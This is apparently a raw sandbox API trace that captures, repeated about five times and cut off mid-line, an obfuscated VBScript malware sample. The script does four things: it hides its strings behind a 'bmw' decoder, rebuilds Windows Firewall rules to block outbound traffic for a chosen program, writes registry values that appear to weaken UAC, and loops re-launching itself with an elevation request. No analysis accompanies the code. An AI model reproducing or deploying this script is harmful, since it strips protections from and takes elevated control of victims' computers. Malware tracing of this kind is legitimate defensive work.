bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 68 [0226.337] wcsncmp (_String1="FPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.337] wcsncmp (_String1="PEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0226.337] wcsncmp (_String1="EBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.337] wcsncmp (_String1="BFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 53 [0226.337] wcsncmp (_String1="FHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 